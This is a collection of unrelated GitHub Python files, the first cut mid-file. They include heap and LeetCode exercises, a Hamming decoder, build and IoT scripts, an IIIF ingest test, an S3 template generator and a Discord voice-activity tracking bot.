idx \n\n#\n# Implementing \"Min Heap\"\n#\n\nclass MinHeap:\n def __init__(self, heapSize):\n self.a = []\n self.max = heapSize\n pass\n\n #\n # Example:\n # obj = MinHeap()\n # ...\n # print(str(obj))\n # [1,2,3]\n #\n\n def __str__(self):\n return \"%s\" % self.a \n\n def dump(self):\n print('%s' % self.a)\n\n #\n # Function to add an element\n # element >= 1\n # \n \"\"\"\n 3\n 1 2\n \"\"\"\n def add(self, element):\n self.a.append(element)\n heapify(self.a)\n pass\n \n #\n # Get the top element of the Heap\n #\n\n def peek(self):\n return self.a[0]\n \n #\n # Delete the top element of the Heap\n #\n\n def pop(self):\n last_i = len(self.a) - 1\n swap(self.a, 0, last_i)\n min_v = self.a.pop()\n down_heapify(self.a)\n return min_v\n \n #\n # return the number of elements in the Heap\n #\n\n def size(self):\n return 0\n","repo_name":"CountChu/LeetCodePython","sub_path":"learn_07_heap/solutions/my001-min-heap-s2.py","file_name":"my001-min-heap-s2.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"70782457641","text":"import argparse\nimport contextlib\nimport numpy as np\n\nfrom inout_bits import BitInputStream, BitOutputStream\n\n\nCORRECTION_MATRIX = np.array([[0, 0, 0, 1, 1, 1, 1],\n [0, 1, 1, 0, 0, 1, 1],\n [1, 0, 1, 0, 1, 0, 1]])\n\n\ndef parse_arguments():\n \"\"\"\n Handle and parse program arguments.\n\n Returns:\n argparse.Namespace: namespace with 2 parsed arguments:\n - in1 -- one input file\n - in2 -- another input file\n \"\"\"\n arg_parser = argparse.ArgumentParser(\n description='Kodowanie pliku korzystająć z rozszerzonego kodu Hamminga (8, 4)'\n )\n\n arg_parser.add_argument(\n 'input_file',\n help='Plik wejściowy',\n\n )\n\n arg_parser.add_argument(\n 'output_file',\n help='Zakodowany plik wyjściowy'\n )\n\n return arg_parser.parse_args()\n\n\nclass HammingDecoder:\n def __init__(self):\n self.doubleErrorCounter = 0\n\n def decode(self, bit_array):\n parity = bit_array[-1]\n bit_array = bit_array[:-1]\n wrong_bit = np.dot(CORRECTION_MATRIX, bit_array) % 2\n wrong_bit = int(f\"0b{''.join(map(str, wrong_bit))}\", 2)\n\n if wrong_bit > 0:\n if parity == 0:\n self.doubleErrorCounter += 1\n else:\n if wrong_bit < 5:\n bit_array[wrong_bit-1] = int(not bit_array[wrong_bit-1])\n\n return bit_array[:4]\n\n\ndef decode():\n \"\"\"Decode file with Hamming coding.\"\"\"\n args = parse_arguments()\n hc = HammingDecoder()\n with contextlib.closing(BitInputStream(open(args.input_file, \"rb\"))) as bit_in, \\\n contextlib.closing(BitOutputStream(open(args.output_file, \"wb\"))) as bit_out:\n bits = bit_in.bits_array(8)\n while bits.size > 0:\n bit_out.write_array(hc.decode(bits))\n bits = bit_in.bits_array(8)\n print(\"Zdekodowano\")\n print(\"Liczba podwójnych błędów:\", hc.doubleErrorCounter)\n\n\nif __name__ == \"__main__\":\n decode()\n","repo_name":"barchuckie/co-co","sub_path":"zad7/dekoder.py","file_name":"dekoder.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"10944001651","text":"# Luke Chase\n# Updated Alice_Words program --- Assessment Program\n# Computer Science II\n# October 1, 2017\ntry:\n file = open(\"Alice's_Adventures_In_Wonderland_via_Gutenberg.txt\", \"r\")\n file = file.read()\n def sort(text):\n dictionary = {}\n alphabetical_dictionary = {}\n word = \"\"\n for aline in text:\n letter = aline\n if letter!= \" \":\n word = word + letter\n else:\n dictionary[word] = text.count(word)\n word = \"\"\n key_list = list(dictionary.keys())\n key_list = sorted(dictionary)\n begin = key_list.index(\"A\")\n for i in key_list[begin:]:\n alphabetical_dictionary[i] = text.count(i)\n return alphabetical_dictionary\n\n dictionary = print(sort(file))\n\n try:\n text_thing = open(\"GET_WRITTEN_ON_YA_ALICE\", \"w\")\n try:\n text_thing.write(str(dictionary))\n finally:\n text_thing.close()\n finally:\n text_thing.close()\nexcept IOError:\n print(\"This file is not found.\")\n","repo_name":"SlyesKimo123/ComputadoraScience2","sub_path":"Assessment/Assessment Program(Alice_Words).py","file_name":"Assessment Program(Alice_Words).py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"74907586921","text":"# from http.server import HTTPServer, SimpleHTTPRequestHandler\nfrom distutils.dir_util import copy_tree\nfrom livereload import Server\nfrom pathlib import Path\nimport contextlib\nimport subprocess\nimport shutil\nimport glob\nimport sys\nimport os\n\nRELEASE_MODE = len(sys.argv) >= 2 and sys.argv[1] == \"--release\"\n\n\ndef supress_stdout(func):\n def wrapper(*a, **ka):\n with open(os.devnull, 'w') as devnull:\n with contextlib.redirect_stdout(devnull):\n func(*a, **ka)\n return wrapper\n\n\ndef make_required_directories():\n Path(\"./build/smooth/__target2__\").mkdir(exist_ok=True, parents=True)\n Path(\"./output\").mkdir(exist_ok=True, parents=True)\n\n\ndef js_to_py(filename):\n return str(filename).replace(\".js\", \".py\")\n\n\ndef js_to_svelte(filename):\n return str(filename).replace(\".js\", \".svelte\")\n\n\ndef copy_to_svelte_project_dir():\n for f in glob.glob('./src/*.*'):\n shutil.copy(f, './build/src')\n for f in glob.glob('./src/pages/*.svelte'):\n shutil.copy(f, './build/src/pages')\n\n\ndef copy_to_root():\n for f in glob.glob('./src/root/*'):\n shutil.copy(f, './output')\n\n\ndef run_transcrypt():\n for f in glob.glob(\"./build/smooth/pages/*.py\"):\n cmd = f\"python ./cryptic/src/__main__.py -b -n -g {f}\"\n subprocess.run(cmd, shell=True, stdout=open(os.devnull, \"w\"))\n copy_tree(\"./build/smooth/pages/__target__\",\n \"./build/smooth/__target2__\")\n\n\ndef append_transpiled_python():\n files = glob.glob(\"./build/smooth/__target2__/*.js\")\n for f in files:\n if \"org.transcrypt.__runtime__\" in f:\n shutil.copy(f, './build/src/pages')\n continue\n with open(f, \"r\") as reader:\n file_contents = reader.read()\n file_contents = \"\"\n file_name = Path(f).name\n svelte_file_name = js_to_svelte(file_name)\n with open(f\"./build/src/pages/{svelte_file_name}\", \"a\") as writer:\n writer.write(\"\")\n writer.write(file_contents)\n\n\ndef rollup():\n if RELEASE_MODE:\n subprocess.run(\"npm run build-prod\", cwd=\"./build\", shell=True)\n else:\n subprocess.run(\"npm run build-dev\", cwd=\"./build\", shell=True)\n\n\ndef run(port=4200):\n server = Server()\n server.watch('src', refresh)\n server.serve(port=port, root='output')\n\n\ndef refresh():\n copy_tree(\"./src\", \"./build/smooth\")\n make_required_directories()\n run_transcrypt()\n copy_to_svelte_project_dir()\n copy_to_root()\n append_transpiled_python()\n rollup()\n\n\nif __name__ == \"__main__\":\n refresh()\n if not RELEASE_MODE:\n run()\n","repo_name":"chris-koch-penn/smooth.py","sub_path":"smoothie.py","file_name":"smoothie.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"}
+{"seq_id":"11409363752","text":"import time\r\nimport json\r\nfrom datetime import datetime\r\nimport requests\r\nimport threading\r\nimport random\r\nimport RPi.GPIO as GPIO\r\nfrom registration import *\r\nfrom MyMQTT import *\r\n\r\n# The RPi controls a LED which is activated based on the freezing status\r\n# MQTT methods:\r\n# subscriber to retrieve info on the freezing status \r\n\r\nclass RPi():\r\n def __init__(self,broker,port,topic, LED_red, LED_green, LED_white):\r\n self.client=MyMQTT('RPI',broker,port,self)\r\n self.topic=topic\r\n self.LED_red = LED_red\r\n self.LED_green = LED_green\r\n self.LED_white = LED_white\r\n self.client.start()\r\n self.client.mySubscribe(self.topic)\r\n def stop(self):\r\n self.client.stop() \r\n def notify(self,payload): \r\n alert = json.loads(payload)\r\n dataIncoming = alert['result'] \r\n # format message: 1 for freezing for sure, 2 for possible freezing, 3 no freezing \r\n \r\n # Initialitation - switch off all the leds\r\n GPIO.output(LED_red, GPIO.LOW)\r\n GPIO.output(LED_white, GPIO.LOW)\r\n GPIO.output(LED_green, GPIO.LOW) \r\n\r\n if dataIncoming == 1: \r\n # 1 = freezing for sure\r\n print('Freezing for sure')\r\n start = time.time() \r\n end = time.time() \r\n # blinks for 5 seconds\r\n while end - start < 5:\r\n GPIO.output(self.LED_red, GPIO.HIGH) # led is switched on\r\n time.sleep(1) # wait for 1 second\r\n GPIO.output(self.LED_red, GPIO.LOW) # led is switched off\r\n time.sleep(1) # wait for 1 second\r\n GPIO.output(self.LED_red, GPIO.HIGH) # led is switched on \r\n end = time.time() \r\n \r\n GPIO.output(self.LED_red, GPIO.HIGH) # red led is switched on, because the user can be absent or not notice it -> more awarness\r\n\r\n elif dataIncoming == 2: \r\n # 2 = possible freezing\r\n print('Possible freezing')\r\n start = time.time() \r\n end = time.time() \r\n # blinks for 5 seconds \r\n while end - start < 5:\r\n GPIO.output(self.LED_white, GPIO.HIGH) # led is switched on\r\n time.sleep(1) # wait for 1 second\r\n GPIO.output(self.LED_white, GPIO.LOW) # led is switched off\r\n time.sleep(1) # wait for 1 second\r\n GPIO.output(self.LED_white, GPIO.HIGH) # led is switched on \r\n end = time.time() \r\n \r\n GPIO.output(self.LED_red, GPIO.HIGH) # red led is switched on, because the user can be absent or not notice it -> more awarness\r\n \r\n else:\r\n print('No freezing')\r\n GPIO.output(self.LED_green, GPIO.HIGH) # green led is switched on in order to \r\n\r\n\r\nclass Update(threading.Thread): # Multithreading for doing the update\r\n def __init__(self, threadID,time_update,sr):\r\n threading.Thread.__init__(self)\r\n self.threadID = threadID\r\n self.time_update=time_update\r\n self.sr=sr\r\n def run(self):\r\n while True:\r\n self.sr.update()\r\n time.sleep(self.time_update)\r\n\r\n\r\nif __name__=='__main__':\r\n # 1. 
SERVICE REGISTRATION to catalog \r\n conf = json.load(open('settings.json')) # read data from settings.json\r\n payload = conf[\"ServiceData\"] # retrieve service data\r\n catalog_URL=conf[\"catalogURL\"] # retrieve catalog url\r\n service = registration(catalog_URL, payload)\r\n try: \r\n service.register()\r\n except:\r\n print('Catalog not connected!')\r\n raise SystemExit\r\n\r\n subscribeTopic = conf[\"ServiceData\"][\"MQTT_Topic\"]\r\n info=(requests.get(catalog_URL+\"/broker\")).json()\r\n\r\n # Set up the Raspberry pi\r\n # set up pin numbering\r\n GPIO.setmode(GPIO.BOARD)\r\n GPIO.setwarnings(False)\r\n\r\n # Assign a pin number to every led corresponding to the raspberry pi header\r\n LED_red = 7 #GPIO4\r\n LED_green = 11 #GPIO17\r\n LED_white = 13 #GPIO27\r\n\r\n # Set the output to the correct pin\r\n GPIO.setup(LED_red, GPIO.OUT)\r\n GPIO.setup(LED_green, GPIO.OUT)\r\n GPIO.setup(LED_white, GPIO.OUT)\r\n\r\n # Initialitation - switch off all the leds\r\n GPIO.output(LED_red, GPIO.LOW)\r\n GPIO.output(LED_white, GPIO.LOW)\r\n GPIO.output(LED_green, GPIO.LOW)\r\n\r\n rpi=RPi(info['broker'][\"url\"],info['broker'][\"port\"],subscribeTopic, LED_red, LED_green, LED_white) \r\n t1 = Update(1,conf['timeforupdate'],service) #updating the timestamp of the service \r\n t1.start()\r\n t1.join()\r\n\r\n while True:\r\n time.sleep(10)\r\n","repo_name":"Joseph9994/Agropy","sub_path":"RPi/Rpi.py","file_name":"Rpi.py","file_ext":"py","file_size_in_byte":5372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"5119021857","text":"import psycopg2\nimport time\n\nfrom Connection import Connection, Listener\nfrom functools import partial\nfrom handlers.request_handlers import list_products, create_product, create_db, seed_db\n\nif __name__ == \"__main__\":\n conn = psycopg2.connect(host=\"postgres\", port=5432, user=\"postgres\")\n request_handlers = {\n \"list-products\": partial(list_products, conn),\n \"create-product\": partial(create_product, conn),\n \"create-database\": partial(create_db, conn),\n \"seed-database\": partial(seed_db, conn),\n }\n c = Connection(\n \"main-queue\",\n \"control-queue\",\n 61613,\n Listener(request_handlers=request_handlers),\n \"warehouse-message-handler\",\n )\n\n while True:\n # keep app running to prevent docker from terminating\n time.sleep(0.01)\n","repo_name":"StefanEvanghelides/eai2019","sub_path":"WarehouseMessageHandler/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"19200050292","text":"# check if list is a mountain array\n# Leetcode, arrays 101\n\n# so many exceptions....\n\nclass Solution:\n def validMountainArray(self, arr: list) -> bool:\n mountain = False\n peak = 0\n\n for i in range(1, len(arr) - 1):\n if arr[i] == arr[i - 1]:\n return False\n\n if arr[i] < arr[i - 1] and arr[i] <= arr[i + 1]:\n peak += 1\n if arr[i] > arr[i - 1] and arr[i] >= arr[i + 1]:\n peak += 1\n\n if peak >= 1 and arr[i] <= arr[i + 1]:\n return False\n\n if peak == 1:\n mountain = True\n\n return mountain\n\nif __name__ == \"__main__\":\n test_arr = [1,1,1,1,1,1,1,2,1]\n\n test_obj = Solution()\n print(test_obj.validMountainArray(test_arr))\n","repo_name":"karanpolobotu/PythonCatchup","sub_path":"Python3code/02-2022/feb19.py","file_name":"feb19.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"16643955804","text":"import argparse\nimport logging\nimport os\nimport sys\n\nimport boto3\n\nROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.insert(0, os.path.join(ROOT_DIR, 'src'))\n\n\nfrom IIIFingest.auth import Credentials # noqa: E402\nfrom IIIFingest.client import Client # noqa: E402\n\n\ndef test_ingest_pipeline(args) -> None:\n\n # Logging configuration\n root = logging.getLogger()\n root.setLevel(logging.INFO)\n\n pkg = logging.getLogger('IIIFingest')\n pkg.setLevel(logging.DEBUG)\n\n handler = logging.StreamHandler(sys.stdout)\n handler.setLevel(logging.DEBUG)\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n )\n handler.setFormatter(formatter)\n root.addHandler(handler)\n\n # Client configuration\n asset_prefix = args.asset_prefix\n issuer = args.issuer\n space = args.space\n environment = args.environment\n session = boto3.Session(profile_name=f\"mps-{space}-{environment}\")\n\n jwt_creds = Credentials(\n issuer=issuer,\n kid=f\"{issuer}default\",\n private_key_path=os.path.join(\n ROOT_DIR, f\"auth/{environment}/keys/{issuer}/{issuer}default/private.key\"\n ),\n )\n\n client = Client(\n space=space,\n environment=environment,\n asset_prefix=asset_prefix,\n jwt_creds=jwt_creds,\n boto_session=session,\n )\n\n images = [\n {\n \"label\": \"27.586.126A\",\n \"filepath\": os.path.join(ROOT_DIR, \"tests/images/mcihtest1.tif\"),\n },\n {\n \"label\": \"27.586.248A\",\n \"filepath\": os.path.join(ROOT_DIR, \"tests/images/mcihtest2.tif\"),\n \"metadata\": [{\"label\": \"Test\", \"value\": \"Image level metadata\"}],\n },\n {\n \"label\": \"27.586.249A\",\n \"filepath\": os.path.join(ROOT_DIR, \"tests/images/mcihtest3.tif\"),\n },\n ]\n\n manifest_level_metadata = {\n \"labels\": [\"Test Manifest MCIH\"],\n \"metadata\": [\n {\n \"label\": \"Creator\",\n \"value\": \"Unknown\",\n \"label_lang\": \"en\",\n \"value_lang\": \"en\",\n },\n {\n \"label\": \"Date\",\n \"value\": \"19th Century\",\n \"label_lang\": \"en\",\n \"value_lang\": \"en\",\n },\n ],\n \"required_statement\": [{\"label\": \"Attribution\", \"value\": \"Jinah Kim\"}],\n \"default_lang\": \"en\",\n \"service_type\": \"ImageService2\",\n \"service_profile\": \"level2\",\n \"rights\": \"http://creativecommons.org/licenses/by-sa/3.0/\",\n \"summary\": \"A test manifest for Mapping Color in History ingest into MPS IIIF delivery solution\",\n \"providers\": [\n {\n \"labels\": [\n {\n \"lang\": \"en\",\n \"value\": \"Harvard University - Arts and Humanities Research Computing (organizing org)\",\n }\n ],\n \"id\": \"http://id.loc.gov/authorities/names/n78096930\",\n },\n {\n \"labels\": [{\"value\": \"Harvard Art Museum (providing org)\"}],\n \"id\": \"http://id.loc.gov/authorities/names/no2008065752\",\n },\n ],\n }\n\n assets = client.upload(images=images, s3_path=\"images/\")\n\n manifest = client.create_manifest(\n manifest_level_metadata=manifest_level_metadata,\n assets=assets,\n )\n\n result = client.ingest(\n assets=assets,\n manifest=manifest,\n )\n\n status = client.jobstatus(result[\"job_id\"])\n print(\"Done: \", status)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--issuer\", \"-i\", help=\"set issuer\", default=\"atdarth\")\n parser.add_argument(\"--space\", \"-s\", help=\"set space\", default=\"atdarth\")\n parser.add_argument(\"--environment\", \"-e\", help=\"set environment\", default=\"qa\")\n parser.add_argument(\"--asset-prefix\", \"-a\", help=\"set asset prefix\", 
default=\"\")\n args = parser.parse_args()\n test_ingest_pipeline(args)\n","repo_name":"martimpassos/iiif-ingest-service","sub_path":"tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":4073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"}
+{"seq_id":"43350948211","text":"from flask import Flask\nfrom parse import Parser\nfrom vectorizer import Vect\n\napp = Flask(__name__)\nparsewiki = Parser(\"../data/WestburyLab.Wikipedia.Corpus.txt\")\n\nvectorCreator = Vect()\n\"\"\"\nUncomment the next line for:\n- Parse Baseline Benchmark\n- Sequential Search Baseline Benchmark\n\"\"\"\n#parsewiki.parse()\n#parsewiki.vanillaQuery(\"Debargha\")\n\n\"\"\"\nUncommment the next line to build a search index\nIndex will be built in SQLite3 for a full text search\n\"\"\"\n#parsewiki.buildIndex()\n\n@app.route('/query/')\ndef query(querystring):\n \"\"\"\n - Use words in search query that are not stopwords\n - Replace those words with synonyms\n - Replace those words with the Word2Vec embeddings\n - Replace those words with the BERT embeddings\n - Replace those words with the AlBERT embeddings\n - Use the augmented strings to run the search\n \"\"\"\n\n closest = []\n try:\n closest = vectorCreator.closest_three(querystring)\n except:\n print(\"Word not in vocabulary\")\n\n\n return(parsewiki.queryIndex(\"{}\".format(querystring)))\n\n#parsewiki.queryIndex(\"Capitalism is terrible\")\n#parsewiki.queryIndex(\"Heart attack symptoms\")\n#parsewiki.queryTableBM25(\"Capitalism is terrible\")\n#parsewiki.queryTableHighlight(\"Sugar\")\n","repo_name":"DebarghaG/Semoogle","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"38981193847","text":"import csv\nimport numpy as np\n\ndef parse_horizon(infile):\n \"\"\"\n Reads a horizon file output from openDetect. Contains inline, xline,\n and offsets\n \"\"\"\n \n ils, xls, values = ([],[],[])\n with open(infile, 'r') as f:\n reader=csv.reader(f, delimiter='\\t')\n for il, xl,z, zero, five, ten, ft, twen, tf, t, tf in reader:\n ils.append(int(il)-1)\n xls.append(int(xl)-1)\n point = [float(i) for i in[zero, five, ten, ft, twen, tf, t, tf]]\n values.append(point)\n \n value_array = np.array(values)\n inlines = np.array(ils)\n xlines = np.array(xls)\n horizons = np.zeros((np.amax(inlines)-np.amin(inlines) +1, \n np.amax(xlines) - np.amin(xlines)+1, value_array.shape[1]))\n horizons[inlines-np.amin(inlines), xlines - np.amin(xlines), :] += values\n \n return horizons\n\ndef horizon_norm(horizon):\n \"\"\"\n Normalize a horizon to unit energy across the offset dimension. Filters out\n zero energy and offset curves with NaNs.\n \"\"\"\n \n normed = np.nan_to_num(horizon / np.sqrt(np.sum(horizon**2, 2))[:,:, np.newaxis])\n normed = normed.reshape(normed.shape[0]*normed.shape[1], normed.shape[2])\n \n normed = normed[np.sum(normed,1) > 0]\n \n return normed\n","repo_name":"ben-bougher/admm_opt","sub_path":"horizon_parse.py","file_name":"horizon_parse.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"70114448041","text":"# \r\n# Given an array nums and a value val, remove all instances of that value in-place and return the new length.\r\n# \r\n# Do not allocate extra space for another array, you must do this by modifying the input array in-place with O(1) extra memory.\r\n# \r\n# The order of elements can be changed. It doesn't matter what you leave beyond the new length.\r\n# \r\n\r\nfrom typing import List\r\nimport pdb\r\n\r\nsolution_json = {\r\n \"date\": \"2021/3/24\",\r\n \"runtime\": \"36 ms\",\r\n \"memory\": \"14.1 MB\"\r\n}\r\n\r\nclass Solution:\r\n def removeElement(self, nums: List[int], val: int) -> int:\r\n idx = 0\r\n for i in range(len(nums)):\r\n line = ''\r\n line += 'nums[%d] = %d, ' % (i, nums[i])\r\n if nums[i] != val:\r\n nums[idx] = nums[i]\r\n line += 'nums[%d] = %d, ' % (idx, nums[idx])\r\n idx += 1\r\n #print(line)\r\n return idx\r\n","repo_name":"CountChu/LeetCodePython","sub_path":"learn_04_fun_with_arrays/solutions/0027-rm-element-s1.py","file_name":"0027-rm-element-s1.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"6306245286","text":"from troposphere import Output, Ref, Template\nfrom troposphere.s3 import Bucket, PublicRead\n\nt = Template(\"Create multiple S3 Bucket for XKE\")\nt.set_version()\n\nfor i in range(1, 10):\n s3_bucket = t.add_resource(Bucket(\"TestBucket\" + str(i),\n BucketName=\"xke-test-bucket-\" + str(i),\n AccessControl=PublicRead))\n t.add_output(Output(\n \"BucketName\" + str(i),\n Value=Ref(s3_bucket),\n Description=\"Name of S3 bucket\"\n ))\n\nprint(t.to_json())\n","repo_name":"fdebuire/cloudformation-troposhere-xke","sub_path":"2-troposphere/S3_multiple_bucket.py","file_name":"S3_multiple_bucket.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"37042588954","text":"import os\n\npath = '/home/lowpaw/Downloads/telegram-bibtexbot/notes'\nnotes_list = os.listdir(path)\nnotes_list.sort()\n\ncontents = []\n\nfor note_name in notes_list:\n fo = open(path + '/' + note_name, 'r')\n contents.append(fo.read())\n fo.close()\n\ncontents = '\\n\\n'.join(contents)\n\nfo = open('/home/lowpaw/Downloads/telegram-bibtexbot/notes.md', \"w\")\nfo.write(contents)\nfo.close()\n\n# html is generated with:\n# https://www.makeuseof.com/md-block-render-markdown-web-page/\n\nnotes_html = ['''\n\n\n\n\n\n\n\n\n''','''\n\n\n\n\n\n'''\n]\n\nfo = open('/home/lowpaw/Downloads/telegram-bibtexbot/notes.html', \"w\")\nfo.write(contents.join(notes_html))\nfo.close()\n","repo_name":"lapamatoz/telegram-bibtexbot","sub_path":"gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"3637200461","text":"#!python3\n\nimport asyncio\nimport datetime\nimport discord\nimport json\nfrom sqlalchemy import Column, DateTime, Interval, Boolean, String\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.orm.exc import NoResultFound\nimport sys\n\n# Database setup\nBase = declarative_base()\n\nclass Member(Base):\n __tablename__ = 'members'\n id = Column(String, primary_key=True)\n name = Column(String)\n last_join = Column(DateTime)\n total_time = Column(Interval)\n in_chat = Column(Boolean)\n\n def update_total_time(self):\n \"\"\"Update total_time with time since last_join\"\"\"\n now = datetime.datetime.now()\n self.total_time += now - self.last_join\n self.last_join = now\n\nengine = create_engine('sqlite:///member_tracker.sqlite')\nsession = sessionmaker()\nsession.configure(bind=engine)\nBase.metadata.create_all(engine)\n\n# Discord client\nclient = discord.Client()\n\n# Helpers\ndef update_active_users():\n \"\"\"Updates total_time for all active users\"\"\"\n s = session()\n for channel in client.get_all_channels():\n for member in channel.voice_members:\n if not member.voice.is_afk:\n try:\n dbmember = s.query(Member).filter(\n Member.id == member.id\n ).one()\n dbmember.in_chat = True\n dbmember.update_total_time()\n except NoResultFound:\n dbmember = Member(\n id=member.id,\n name=member.nick if member.nick else member.name,\n last_join=datetime.datetime.now(),\n total_time=datetime.timedelta(0),\n in_chat=True\n )\n s.add(dbmember)\n s.commit()\n\ndef check_admin(message):\n \"\"\"Checks if the message is from an administrator\"\"\"\n perms = message.channel.permissions_for(message.author)\n is_admin = perms.administrator\n try:\n for role in message.author.roles:\n if \"Admins\" in role.name or \"Founder\" in role.name:\n is_admin = True\n break\n except AttributeError:\n # Bypass for redkrieg to work in private messages\n if str(message.author.id) == \"135195179219943424\":\n is_admin = True\n return is_admin\n\ndef format_timedelta(td):\n \"\"\"Formats timedelta without microseconds\"\"\"\n # Modified from stdlib datetime.timedelta.__str__\n mm, ss = divmod(td.seconds, 60)\n hh, mm = divmod(mm, 60)\n s = \"%d:%02d:%02d\" % (hh, mm, ss)\n if td.days:\n def plural(n):\n return n, abs(n) != 1 and \"s\" or \"\"\n s = (\"%d day%s, \" % plural(td.days)) + s\n return s\n\n\n# Background events\nasync def active_user_update_loop():\n \"\"\"Reset join times, wait for discord connection, then keep db synced\"\"\"\n s = session()\n members = s.query(Member).all()\n now = datetime.datetime.now()\n for member in members:\n member.in_chat = False\n member.last_join = now\n s.commit()\n await client.wait_until_ready()\n while not client.is_closed:\n update_active_users()\n await asyncio.sleep(60)\n\n# Discord events\n@client.event\nasync def on_voice_state_update(before, after):\n \"\"\"Monitor status updates for voice channels\"\"\"\n s = session()\n # prefer nickname in server to actual discord username\n member_name = before.nick if before.nick else before.name\n try:\n member = s.query(Member).filter(Member.id == before.id).one()\n # update member names on each channel join\n member.name = member_name\n except NoResultFound:\n member = Member(\n id=before.id,\n name=member_name,\n last_join=datetime.datetime.now(),\n total_time=datetime.timedelta(0),\n in_chat=False\n )\n s.add(member)\n if after.voice.voice_channel is None:\n if member.in_chat:\n member.in_chat = 
False\n member.update_total_time()\n try:\n channel_name = before.voice.voice_channel.name\n except AttributeError:\n channel_name = \"Unknown\"\n print(\"{} left voice channel {}. Total time: {}\".format(\n member.name,\n channel_name,\n member.total_time\n ))\n else:\n if member.in_chat:\n # Don't consider deafened or afk users as active\n if after.voice.is_afk or after.voice.self_deaf or after.voice.deaf:\n # This logic breaks if the user is server deafened and\n # self-deafens as well. Need to think through.\n member.in_chat = False\n member.update_total_time()\n else:\n member.in_chat = True\n member.last_join = datetime.datetime.now()\n try:\n channel_name = after.voice.voice_channel.name\n except AttributeError:\n channel_name = \"Private\"\n print(\"{} joined voice channel {}. Total time: {}\".format(\n member.name,\n channel_name,\n member.total_time\n ))\n s.commit()\n sys.stdout.flush()\n\n@client.event\nasync def on_message(message):\n \"\"\"Handles incoming messages\"\"\"\n if message.author == client.user:\n return\n\n if not check_admin(message):\n return\n\n if message.content.startswith('!velocistats'):\n s = session()\n if len(message.mentions) > 0:\n for member in message.mentions:\n try:\n dbmember = s.query(Member).filter(\n Member.id == member.id\n ).one()\n except NoResultFound:\n await client.send_message(\n message.channel,\n \"User {} not found!\".format(\n member.nick if member.nick else member.name\n )\n )\n continue\n if dbmember.in_chat:\n dbmember.update_total_time()\n s.commit()\n await client.send_message(\n message.channel,\n \"User {0} has a total chat time of {1}\".format(\n dbmember.name,\n format_timedelta(dbmember.total_time)\n )\n )\n elif message.content.startswith('!velocistats low'):\n members = s.query(Member).order_by(\n Member.total_time.asc()\n ).filter(\n Member.name.startswith('-=[ V ]=-')\n ).limit(10).all()\n msg = [ \"\"\"Current Lowest Voice Users\\n\\n```\"\"\" ]\n for member in members:\n if member.in_chat:\n member.update_total_time()\n msg.append(\n \"{0: <40}{1: >25}\\n\".format(\n member.name,\n format_timedelta(member.total_time)\n )\n )\n msg.append(\"\"\"```\"\"\")\n s.commit()\n await client.send_message(\n message.channel,\n ''.join(msg)\n )\n else:\n members = s.query(Member).order_by(\n Member.total_time.desc()\n ).limit(10).all()\n msg = [ \"\"\"Current Top Voice Users\\n\\n```\"\"\" ]\n for member in members:\n if member.in_chat:\n member.update_total_time()\n msg.append(\n \"{0: <40}{1: >25}\\n\".format(\n member.name,\n format_timedelta(member.total_time)\n )\n )\n msg.append(\"\"\"```\"\"\")\n s.commit()\n await client.send_message(\n message.channel,\n ''.join(msg)\n )\n\n@client.event\nasync def on_ready():\n \"\"\"Print out some status info on connect\"\"\"\n print('Logged in as')\n print(client.user.name)\n print(client.user.id)\n print('------')\n sys.stdout.flush()\n\n# Configuration\nwith open('token.json') as f:\n token = json.load(f)['token']\n \n# Run it\nclient.loop.create_task(active_user_update_loop())\nclient.run(token)\n","repo_name":"RedKrieg/velocibot","sub_path":"velocibot.py","file_name":"velocibot.py","file_ext":"py","file_size_in_byte":8339,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"}
